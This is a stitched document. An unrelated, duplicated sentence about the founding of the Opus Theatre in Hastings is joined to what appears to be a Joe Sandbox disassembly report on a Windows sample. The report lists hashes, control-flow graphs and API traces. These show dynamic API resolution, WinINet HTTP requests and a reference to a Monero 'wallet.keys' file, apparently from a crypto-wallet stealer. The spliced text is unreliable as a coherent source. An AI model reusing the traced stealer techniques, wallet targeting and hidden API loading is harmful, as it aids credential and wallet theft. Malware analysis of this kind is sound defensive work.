Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 6b6435f183e1995f11b6bd29c927bf030d2a1718898e6ff8be8ceada4f93dcd4
                          • Instruction ID: 64b2330620c5ceef7b50a6ef57dd68c69d7c2650cf419e0846b8de95aecd4a0c
                          • Opcode Fuzzy Hash: 6b6435f183e1995f11b6bd29c927bf030d2a1718898e6ff8be8ceada4f93dcd4
                          • Instruction Fuzzy Hash: 4641E4706D67046EE72CBBE68842EFF77679F46708F505048B84456286CBB0660CEFA7
                          Function 00164880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 164880-164942 call 17a7a0 call 1647b0 call 17a740 * 5 InternetOpenA StrCmpCA 816 164944 801->816 817 16494b-16494f 801->817 816->817 818 164955-164acd call 178b60 call 17a920 call 17a8a0 call 17a800 * 2 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a920 call 17a8a0 call 17a800 * 2 InternetConnectA 817->818 819 164ecb-164ef3 InternetCloseHandle call 17aad0 call 169ac0 817->819 818->819 905 164ad3-164ad7 818->905 828 164ef5-164f2d call 17a820 call 17a9b0 call 17a8a0 call 17a800 819->828 829 164f32-164fa2 call 178990 * 2 call 17a7a0 call 17a800 * 8 819->829 828->829 906 164ae5 905->906 907 164ad9-164ae3 905->907 908 164aef-164b22 HttpOpenRequestA 906->908 907->908 909 164ebe-164ec5 InternetCloseHandle 908->909 910 164b28-164e28 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a9b0 call 17a8a0 call 17a800 call 17a920 call 17a8a0 call 17a800 call 17a740 call 17a920 * 2 call 17a8a0 call 17a800 * 2 call 17aad0 lstrlen call 17aad0 * 2 lstrlen call 17aad0 HttpSendRequestA 908->910 909->819 1021 164e32-164e5c InternetReadFile 910->1021 1022 164e67-164eb9 InternetCloseHandle call 17a800 1021->1022 1023 164e5e-164e65 1021->1023 1022->909 1023->1022 1024 164e69-164ea7 call 17a9b0 call 17a8a0 call 17a800 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                            • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00164915
                          • StrCmpCA.SHLWAPI(?,00CCFC38), ref: 0016493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00164ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00180DDB,00000000,?,?,00000000,?,",00000000,?,00CCFB08), ref: 00164DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00164E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00164E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00164E49
                          • InternetCloseHandle.WININET(00000000), ref: 00164EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00164EC5
                          • HttpOpenRequestA.WININET(00000000,00CCFC08,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00164B15
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • InternetCloseHandle.WININET(00000000), ref: 00164ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: e552fafee8b7bfaa1975bd1b0c885104da73d4c46b0c0c490dba3f8b8f4a1437
                          • Instruction ID: c84aad9c0e5ba540fec79ee6d288a23df7ee02f6beb75a57d62d409aac4d23f0
                          • Opcode Fuzzy Hash: e552fafee8b7bfaa1975bd1b0c885104da73d4c46b0c0c490dba3f8b8f4a1437
                          • Instruction Fuzzy Hash: 1212C072950118ABDB15EBA0DC62FEEB378BF65305F908199B11A63091DF702F49CF62
                          Function 00177850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001611B7), ref: 00177880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00177887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0017789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 49edd355805275fb6842376e97ba8664f2e4662de8f6cf364eaece387fddb8f9
                          • Instruction ID: de7c43dab5245a0d267a5b1fecadb3bba5b9a7f0d52807b65833c29c1cdb3228
                          • Opcode Fuzzy Hash: 49edd355805275fb6842376e97ba8664f2e4662de8f6cf364eaece387fddb8f9
                          • Instruction Fuzzy Hash: 6CF04FB2944609ABC714DF98DD49FAEBBBCEB05B11F10025AFA05A3680C7791904CBA2
                          Function 00161160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 45073d73345929d6bf0d4c340b1040569635caa24148e475449ce56d07dd5b1a
                          • Instruction ID: 214c360b8890f9fe7512a77baa9e3c01e4391bc03b061232562b04d3cd01bda9
                          • Opcode Fuzzy Hash: 45073d73345929d6bf0d4c340b1040569635caa24148e475449ce56d07dd5b1a
                          • Instruction Fuzzy Hash: 9FD017759002089BCB009BE098496AEBB7CEB0A312F000554D90562240EB315891CAA6
                          Function 00179C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 179c10-179c1a 634 17a036-17a0ca LoadLibraryA * 8 633->634 635 179c20-17a031 GetProcAddress * 43 633->635 636 17a146-17a14d 634->636 637 17a0cc-17a141 GetProcAddress * 5 634->637 635->634 638 17a216-17a21d 636->638 639 17a153-17a211 GetProcAddress * 8 636->639 637->636 640 17a21f-17a293 GetProcAddress * 5 638->640 641 17a298-17a29f 638->641 639->638 640->641 642 17a337-17a33e 641->642 643 17a2a5-17a332 GetProcAddress * 6 641->643 644 17a344-17a41a GetProcAddress * 9 642->644 645 17a41f-17a426 642->645 643->642 644->645 646 17a4a2-17a4a9 645->646 647 17a428-17a49d GetProcAddress * 5 645->647 648 17a4dc-17a4e3 646->648 649 17a4ab-17a4d7 GetProcAddress * 2 646->649 647->646 650 17a515-17a51c 648->650 651 17a4e5-17a510 GetProcAddress * 2 648->651 649->648 652 17a612-17a619 650->652 653 17a522-17a60d GetProcAddress * 10 650->653 651->650 654 17a67d-17a684 652->654 655 17a61b-17a678 GetProcAddress * 4 652->655 653->652 656 17a686-17a699 GetProcAddress 654->656 657 17a69e-17a6a5 654->657 655->654 656->657 658 17a6a7-17a703 GetProcAddress * 4 657->658 659 17a708-17a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00CB66C0), ref: 00179C2D
                          • GetProcAddress.KERNEL32(76210000,00CB6300), ref: 00179C45
                          • GetProcAddress.KERNEL32(76210000,00CC97E0), ref: 00179C5E
                          • GetProcAddress.KERNEL32(76210000,00CC9870), ref: 00179C76
                          • GetProcAddress.KERNEL32(76210000,00CC97F8), ref: 00179C8E
                          • GetProcAddress.KERNEL32(76210000,00CCDCD0), ref: 00179CA7
                          • GetProcAddress.KERNEL32(76210000,00CBA820), ref: 00179CBF
                          • GetProcAddress.KERNEL32(76210000,00CCDC70), ref: 00179CD7
                          • GetProcAddress.KERNEL32(76210000,00CCDCE8), ref: 00179CF0
                          • GetProcAddress.KERNEL32(76210000,00CCDD48), ref: 00179D08
                          • GetProcAddress.KERNEL32(76210000,00CCDAD8), ref: 00179D20
                          • GetProcAddress.KERNEL32(76210000,00CB63E0), ref: 00179D39
                          • GetProcAddress.KERNEL32(76210000,00CB6500), ref: 00179D51
                          • GetProcAddress.KERNEL32(76210000,00CB6520), ref: 00179D69
                          • GetProcAddress.KERNEL32(76210000,00CB65C0), ref: 00179D82
                          • GetProcAddress.KERNEL32(76210000,00CCDD00), ref: 00179D9A
                          • GetProcAddress.KERNEL32(76210000,00CCDB08), ref: 00179DB2
                          • GetProcAddress.KERNEL32(76210000,00CBA780), ref: 00179DCB
                          • GetProcAddress.KERNEL32(76210000,00CB65E0), ref: 00179DE3
                          • GetProcAddress.KERNEL32(76210000,00CCDBB0), ref: 00179DFB
                          • GetProcAddress.KERNEL32(76210000,00CCDA90), ref: 00179E14
                          • GetProcAddress.KERNEL32(76210000,00CCDD60), ref: 00179E2C
                          • GetProcAddress.KERNEL32(76210000,00CCDD78), ref: 00179E44
                          • GetProcAddress.KERNEL32(76210000,00CB6340), ref: 00179E5D
                          • GetProcAddress.KERNEL32(76210000,00CCDB38), ref: 00179E75
                          • GetProcAddress.KERNEL32(76210000,00CCDAA8), ref: 00179E8D
                          • GetProcAddress.KERNEL32(76210000,00CCDB98), ref: 00179EA6
                          • GetProcAddress.KERNEL32(76210000,00CCDD18), ref: 00179EBE
                          • GetProcAddress.KERNEL32(76210000,00CCDC40), ref: 00179ED6
                          • GetProcAddress.KERNEL32(76210000,00CCDB20), ref: 00179EEF
                          • GetProcAddress.KERNEL32(76210000,00CCDD30), ref: 00179F07
                          • GetProcAddress.KERNEL32(76210000,00CCDBC8), ref: 00179F1F
                          • GetProcAddress.KERNEL32(76210000,00CCDC58), ref: 00179F38
                          • GetProcAddress.KERNEL32(76210000,00CBFE60), ref: 00179F50
                          • GetProcAddress.KERNEL32(76210000,00CCDAC0), ref: 00179F68
                          • GetProcAddress.KERNEL32(76210000,00CCDBE0), ref: 00179F81
                          • GetProcAddress.KERNEL32(76210000,00CB6360), ref: 00179F99
                          • GetProcAddress.KERNEL32(76210000,00CCDBF8), ref: 00179FB1
                          • GetProcAddress.KERNEL32(76210000,00CB6380), ref: 00179FCA
                          • GetProcAddress.KERNEL32(76210000,00CCDAF0), ref: 00179FE2
                          • GetProcAddress.KERNEL32(76210000,00CCDC10), ref: 00179FFA
                          • GetProcAddress.KERNEL32(76210000,00CB64C0), ref: 0017A013
                          • GetProcAddress.KERNEL32(76210000,00CB6540), ref: 0017A02B
                          • LoadLibraryA.KERNEL32(00CCDB50,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A03D
                          • LoadLibraryA.KERNEL32(00CCDB68,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A04E
                          • LoadLibraryA.KERNEL32(00CCDC88,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A060
                          • LoadLibraryA.KERNEL32(00CCDB80,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A072
                          • LoadLibraryA.KERNEL32(00CCDCA0,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A083
                          • LoadLibraryA.KERNEL32(00CCDC28,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A095
                          • LoadLibraryA.KERNEL32(00CCDCB8,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A0A7
                          • LoadLibraryA.KERNEL32(00CCDEC8,?,00175CA3,00180AEB,?,?,?,?,?,?,?,?,?,?,00180AEA,00180AE3), ref: 0017A0B8
                          • GetProcAddress.KERNEL32(751E0000,00CB6560), ref: 0017A0DA
                          • GetProcAddress.KERNEL32(751E0000,00CCDEE0), ref: 0017A0F2
                          • GetProcAddress.KERNEL32(751E0000,00CC9338), ref: 0017A10A
                          • GetProcAddress.KERNEL32(751E0000,00CCDE80), ref: 0017A123
                          • GetProcAddress.KERNEL32(751E0000,00CB6600), ref: 0017A13B
                          • GetProcAddress.KERNEL32(700F0000,00CBA578), ref: 0017A160
                          • GetProcAddress.KERNEL32(700F0000,00CB6A20), ref: 0017A179
                          • GetProcAddress.KERNEL32(700F0000,00CBA5A0), ref: 0017A191
                          • GetProcAddress.KERNEL32(700F0000,00CCDD90), ref: 0017A1A9
                          • GetProcAddress.KERNEL32(700F0000,00CCDEB0), ref: 0017A1C2
                          • GetProcAddress.KERNEL32(700F0000,00CB67A0), ref: 0017A1DA
                          • GetProcAddress.KERNEL32(700F0000,00CB6880), ref: 0017A1F2
                          • GetProcAddress.KERNEL32(700F0000,00CCDDF0), ref: 0017A20B
                          • GetProcAddress.KERNEL32(753A0000,00CB6A40), ref: 0017A22C
                          • GetProcAddress.KERNEL32(753A0000,00CB69C0), ref: 0017A244
                          • GetProcAddress.KERNEL32(753A0000,00CCDDD8), ref: 0017A25D
                          • GetProcAddress.KERNEL32(753A0000,00CCDE20), ref: 0017A275
                          • GetProcAddress.KERNEL32(753A0000,00CB6700), ref: 0017A28D
                          • GetProcAddress.KERNEL32(76310000,00CBA870), ref: 0017A2B3
                          • GetProcAddress.KERNEL32(76310000,00CBA438), ref: 0017A2CB
                          • GetProcAddress.KERNEL32(76310000,00CCDE38), ref: 0017A2E3
                          • GetProcAddress.KERNEL32(76310000,00CB6920), ref: 0017A2FC
                          • GetProcAddress.KERNEL32(76310000,00CB6860), ref: 0017A314
                          • GetProcAddress.KERNEL32(76310000,00CBA618), ref: 0017A32C
                          • GetProcAddress.KERNEL32(76910000,00CCDEF8), ref: 0017A352
                          • GetProcAddress.KERNEL32(76910000,00CB6740), ref: 0017A36A
                          • GetProcAddress.KERNEL32(76910000,00CC93D8), ref: 0017A382
                          • GetProcAddress.KERNEL32(76910000,00CCDE50), ref: 0017A39B
                          • GetProcAddress.KERNEL32(76910000,00CCDF10), ref: 0017A3B3
                          • GetProcAddress.KERNEL32(76910000,00CB6760), ref: 0017A3CB
                          • GetProcAddress.KERNEL32(76910000,00CB6720), ref: 0017A3E4
                          • GetProcAddress.KERNEL32(76910000,00CCDE08), ref: 0017A3FC
                          • GetProcAddress.KERNEL32(76910000,00CCDE68), ref: 0017A414
                          • GetProcAddress.KERNEL32(75B30000,00CB67C0), ref: 0017A436
                          • GetProcAddress.KERNEL32(75B30000,00CCDE98), ref: 0017A44E
                          • GetProcAddress.KERNEL32(75B30000,00CCDF28), ref: 0017A466
                          • GetProcAddress.KERNEL32(75B30000,00CCDF40), ref: 0017A47F
                          • GetProcAddress.KERNEL32(75B30000,00CCDDA8), ref: 0017A497
                          • GetProcAddress.KERNEL32(75670000,00CB68A0), ref: 0017A4B8
                          • GetProcAddress.KERNEL32(75670000,00CB6A60), ref: 0017A4D1
                          • GetProcAddress.KERNEL32(76AC0000,00CB69A0), ref: 0017A4F2
                          • GetProcAddress.KERNEL32(76AC0000,00CCDDC0), ref: 0017A50A
                          • GetProcAddress.KERNEL32(6F4E0000,00CB67E0), ref: 0017A530
                          • GetProcAddress.KERNEL32(6F4E0000,00CB68C0), ref: 0017A548
                          • GetProcAddress.KERNEL32(6F4E0000,00CB68E0), ref: 0017A560
                          • GetProcAddress.KERNEL32(6F4E0000,00CCD898), ref: 0017A579
                          • GetProcAddress.KERNEL32(6F4E0000,00CB6900), ref: 0017A591
                          • GetProcAddress.KERNEL32(6F4E0000,00CB6940), ref: 0017A5A9
                          • GetProcAddress.KERNEL32(6F4E0000,00CB6780), ref: 0017A5C2
                          • GetProcAddress.KERNEL32(6F4E0000,00CB6800), ref: 0017A5DA
                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0017A5F1
                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0017A607
                          • GetProcAddress.KERNEL32(75AE0000,00CCD958), ref: 0017A629
                          • GetProcAddress.KERNEL32(75AE0000,00CC9448), ref: 0017A641
                          • GetProcAddress.KERNEL32(75AE0000,00CCD7A8), ref: 0017A659
                          • GetProcAddress.KERNEL32(75AE0000,00CCD790), ref: 0017A672
                          • GetProcAddress.KERNEL32(76300000,00CB6960), ref: 0017A693
                          • GetProcAddress.KERNEL32(6FE40000,00CCD8E0), ref: 0017A6B4
                          • GetProcAddress.KERNEL32(6FE40000,00CB6820), ref: 0017A6CD
                          • GetProcAddress.KERNEL32(6FE40000,00CCD880), ref: 0017A6E5
                          • GetProcAddress.KERNEL32(6FE40000,00CCD8B0), ref: 0017A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: 05a552ea490c5d82e0f4ff537123782e813de8a809e9f9d011df9cff5dd133b7
                          • Instruction ID: 14c85a42115091d7d2d318f67ef6c37cd0313e821f97b4e88a569e4035e704a9
                          • Opcode Fuzzy Hash: 05a552ea490c5d82e0f4ff537123782e813de8a809e9f9d011df9cff5dd133b7
                          • Instruction Fuzzy Hash: AF622CB7500A10AFC397DFA8ED889663BFDF78E701F14851AA609C3264D73A9841DF52
                          Function 00166280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 166280-16630b call 17a7a0 call 1647b0 call 17a740 InternetOpenA StrCmpCA 1040 166314-166318 1033->1040 1041 16630d 1033->1041 1042 16631e-166342 InternetConnectA 1040->1042 1043 166509-166525 call 17a7a0 call 17a800 * 2 1040->1043 1041->1040 1044 1664ff-166503 InternetCloseHandle 1042->1044 1045 166348-16634c 1042->1045 1061 166528-16652d 1043->1061 1044->1043 1047 16634e-166358 1045->1047 1048 16635a 1045->1048 1050 166364-166392 HttpOpenRequestA 1047->1050 1048->1050 1053 1664f5-1664f9 InternetCloseHandle 1050->1053 1054 166398-16639c 1050->1054 1053->1044 1056 1663c5-166405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 16639e-1663bf InternetSetOptionA 1054->1057 1059 166407-166427 call 17a740 call 17a800 * 2 1056->1059 1060 16642c-16644b call 178940 1056->1060 1057->1056 1059->1061 1066 16644d-166454 1060->1066 1067 1664c9-1664e9 call 17a740 call 17a800 * 2 1060->1067 1071 166456-166480 InternetReadFile 1066->1071 1072 1664c7-1664ef InternetCloseHandle 1066->1072 1067->1061 1076 166482-166489 1071->1076 1077 16648b 1071->1077 1072->1053 1076->1077 1080 16648d-1664c5 call 17a9b0 call 17a8a0 call 17a800 1076->1080 1077->1072 1080->1071
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                            • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • InternetOpenA.WININET(00180DFE,00000001,00000000,00000000,00000000), ref: 001662E1
                          • StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00166303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00166335
                          • HttpOpenRequestA.WININET(00000000,GET,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00166385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001663BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001663D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001663FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0016646D
                          • InternetCloseHandle.WININET(00000000), ref: 001664EF
                          • InternetCloseHandle.WININET(00000000), ref: 001664F9
                          • InternetCloseHandle.WININET(00000000), ref: 00166503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
